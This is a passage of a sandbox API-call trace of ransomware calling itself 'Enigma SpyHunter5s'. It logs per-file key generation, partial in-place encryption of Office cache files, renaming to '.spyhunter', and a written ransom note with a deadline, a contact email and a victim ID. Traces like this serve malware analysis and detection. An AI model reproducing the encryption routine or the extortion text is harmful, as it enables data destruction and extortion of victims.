CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fef0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fef0*=0x30) returned 1 [0082.161] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0082.163] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0082.163] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".txt") returned 0x0 [0082.163] GetProcessHeap () returned 0x2c0000 [0082.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0082.163] ReadFile (in: hFile=0xd0, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x248feb4*=0x2800, lpOverlapped=0x0) returned 1 [0082.595] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.595] WriteFile (in: hFile=0xd0, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x248feb4*=0x2800, lpOverlapped=0x0) returned 1 [0082.595] GetProcessHeap () returned 0x2c0000 [0082.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0082.595] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.595] WriteFile (in: hFile=0xd0, lpBuffer=0x248fef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x248fef4*, lpNumberOfBytesWritten=0x248feb4*=0x4, lpOverlapped=0x0) returned 1 [0082.597] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248feb4*=0x30, lpOverlapped=0x0) returned 1 [0082.597] CloseHandle (hObject=0xd0) returned 1 [0083.672] GetProcessHeap () returned 0x2c0000 [0083.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.673] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.spyhunter") returned 91 [0083.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.spyhunter")) returned 1 [0083.673] GetProcessHeap () returned 0x2c0000 [0083.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.673] GetProcessHeap () returned 0x2c0000 [0083.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.674] GetProcessHeap () returned 0x2c0000 [0083.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327ec8 | out: hHeap=0x2c0000) returned 1 [0083.674] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fef0 | out: pbBuffer=0x248fef0) returned 1 [0083.674] GetProcessHeap () returned 0x2c0000 [0083.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.674] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fee8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fee8*=0x30) returned 1 [0083.674] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0083.674] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0083.674] StrStrW (lpFirst="pss10r.chm", lpSrch=".txt") returned 0x0 [0083.674] GetProcessHeap () returned 0x2c0000 [0083.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32fb58 [0083.674] ReadFile (in: hFile=0xd0, lpBuffer=0x32fb58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesRead=0x248feac*=0x2800, lpOverlapped=0x0) returned 1 [0083.687] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.687] WriteFile (in: hFile=0xd0, lpBuffer=0x32fb58*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesWritten=0x248feac*=0x2800, lpOverlapped=0x0) returned 1 [0083.687] GetProcessHeap () returned 0x2c0000 [0083.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb58 | out: hHeap=0x2c0000) returned 1 [0083.688] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.688] WriteFile (in: hFile=0xd0, lpBuffer=0x248feec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x248feec*, lpNumberOfBytesWritten=0x248feac*=0x4, lpOverlapped=0x0) returned 1 [0083.689] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248feac*=0x30, lpOverlapped=0x0) returned 1 [0083.689] CloseHandle (hObject=0xd0) returned 1 [0083.690] GetProcessHeap () returned 0x2c0000 [0083.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.692] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.spyhunter") returned 87 [0083.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.spyhunter")) returned 1 [0083.692] GetProcessHeap () returned 0x2c0000 [0083.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.692] GetProcessHeap () returned 0x2c0000 [0083.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.693] GetProcessHeap () returned 0x2c0000 [0083.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326c58 | out: hHeap=0x2c0000) returned 1 [0083.693] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fef0 | out: pbBuffer=0x248fef0) returned 1 [0083.693] GetProcessHeap () returned 0x2c0000 [0083.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.693] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fee8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fee8*=0x30) returned 1 [0083.693] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0083.693] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0083.693] StrStrW (lpFirst="osetupui.dll", lpSrch=".txt") returned 0x0 [0083.693] GetProcessHeap () returned 0x2c0000 [0083.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32fb58 [0083.694] ReadFile (in: hFile=0xd0, lpBuffer=0x32fb58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesRead=0x248feac*=0x2800, lpOverlapped=0x0) returned 1 [0083.699] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.699] WriteFile (in: hFile=0xd0, lpBuffer=0x32fb58*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesWritten=0x248feac*=0x2800, lpOverlapped=0x0) returned 1 [0083.699] GetProcessHeap () returned 0x2c0000 [0083.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb58 | out: hHeap=0x2c0000) returned 1 [0083.701] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.701] WriteFile (in: hFile=0xd0, lpBuffer=0x248feec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x248feec*, lpNumberOfBytesWritten=0x248feac*=0x4, lpOverlapped=0x0) returned 1 [0083.712] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248feac*=0x30, lpOverlapped=0x0) returned 1 [0083.712] CloseHandle (hObject=0xd0) returned 1 [0083.722] GetProcessHeap () returned 0x2c0000 [0083.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.722] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.spyhunter") returned 89 [0083.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.spyhunter")) returned 1 [0083.723] GetProcessHeap () returned 0x2c0000 [0083.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.723] GetProcessHeap () returned 0x2c0000 [0083.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.723] GetProcessHeap () returned 0x2c0000 [0083.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326b70 | out: hHeap=0x2c0000) returned 1 [0083.723] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fee8 | out: pbBuffer=0x248fee8) returned 1 [0083.723] GetProcessHeap () returned 0x2c0000 [0083.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.723] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fee0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fee0*=0x30) returned 1 [0083.723] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0083.723] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0083.723] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".txt") returned 0x0 [0083.723] GetProcessHeap () returned 0x2c0000 [0083.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32fb58 [0083.724] ReadFile (in: hFile=0xd0, lpBuffer=0x32fb58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fea4, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesRead=0x248fea4*=0x2800, lpOverlapped=0x0) returned 1 [0083.735] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.735] WriteFile (in: hFile=0xd0, lpBuffer=0x32fb58*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fea4, lpOverlapped=0x0 | out: lpBuffer=0x32fb58*, lpNumberOfBytesWritten=0x248fea4*=0x2800, lpOverlapped=0x0) returned 1 [0083.735] GetProcessHeap () returned 0x2c0000 [0083.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb58 | out: hHeap=0x2c0000) returned 1 [0083.736] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.736] WriteFile (in: hFile=0xd0, lpBuffer=0x248fee4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fea4, lpOverlapped=0x0 | out: lpBuffer=0x248fee4*, lpNumberOfBytesWritten=0x248fea4*=0x4, lpOverlapped=0x0) returned 1 [0083.895] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fea4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fea4*=0x30, lpOverlapped=0x0) returned 1 [0083.895] CloseHandle (hObject=0xd0) returned 1 [0083.907] GetProcessHeap () returned 0x2c0000 [0083.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0083.907] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.spyhunter") returned 93 [0083.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.spyhunter")) returned 1 [0083.908] GetProcessHeap () returned 0x2c0000 [0083.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0083.908] GetProcessHeap () returned 0x2c0000 [0083.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.908] GetProcessHeap () returned 0x2c0000 [0083.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328288 | out: hHeap=0x2c0000) returned 1 [0083.908] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fee8 | out: pbBuffer=0x248fee8) returned 1 [0083.908] GetProcessHeap () returned 0x2c0000 [0083.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.908] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fee0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fee0*=0x30) returned 1 [0083.908] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x323990 | out: hHeap=0x2c0000) returned 1 [0083.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fee0 | out: pbBuffer=0x248fee0) returned 1 [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fed8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fed8*=0x30) returned 1 [0083.909] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3238b8 | out: hHeap=0x2c0000) returned 1 [0083.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fee0 | out: pbBuffer=0x248fee0) returned 1 [0083.909] GetProcessHeap () returned 0x2c0000 [0083.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0083.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fed8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fed8*=0x30) returned 1 [0083.909] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0083.910] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0083.910] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".txt") returned 0x0 [0083.910] GetProcessHeap () returned 0x2c0000 [0083.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32fb18 [0083.910] ReadFile (in: hFile=0xd0, lpBuffer=0x32fb18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32fb18*, lpNumberOfBytesRead=0x248fe9c*=0x2800, lpOverlapped=0x0) returned 1 [0083.912] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.912] WriteFile (in: hFile=0xd0, lpBuffer=0x32fb18*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x32fb18*, lpNumberOfBytesWritten=0x248fe9c*=0x2800, lpOverlapped=0x0) returned 1 [0083.913] GetProcessHeap () returned 0x2c0000 [0083.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb18 | out: hHeap=0x2c0000) returned 1 [0083.913] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.913] WriteFile (in: hFile=0xd0, lpBuffer=0x248fedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x248fedc*, lpNumberOfBytesWritten=0x248fe9c*=0x4, lpOverlapped=0x0) returned 1 [0083.930] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe9c*=0x30, lpOverlapped=0x0) returned 1 [0083.930] CloseHandle (hObject=0xd0) returned 1 [0084.846] GetProcessHeap () returned 0x2c0000 [0084.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0084.846] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.spyhunter") returned 89 [0084.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.spyhunter")) returned 1 [0084.847] GetProcessHeap () returned 0x2c0000 [0084.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0084.847] GetProcessHeap () returned 0x2c0000 [0084.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0084.847] GetProcessHeap () returned 0x2c0000 [0084.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326a88 | out: hHeap=0x2c0000) returned 1 [0084.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\designer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0084.848] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.848] WriteFile (in: hFile=0xd0, lpBuffer=0x248fe0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ff38, lpOverlapped=0x0 | out: lpBuffer=0x248fe0f*, lpNumberOfBytesWritten=0x248ff38*=0x127, lpOverlapped=0x0) returned 1 [0084.848] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.848] WriteFile (in: hFile=0xd0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ff38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ff38*=0x2ac, lpOverlapped=0x0) returned 1 [0084.849] CloseHandle (hObject=0xd0) returned 1 [0084.849] GetProcessHeap () returned 0x2c0000 [0084.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330a60 | out: hHeap=0x2c0000) returned 1 [0084.849] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fed8 | out: pbBuffer=0x248fed8) returned 1 [0084.849] GetProcessHeap () returned 0x2c0000 [0084.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0084.849] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fed0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fed0*=0x30) returned 1 [0084.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common 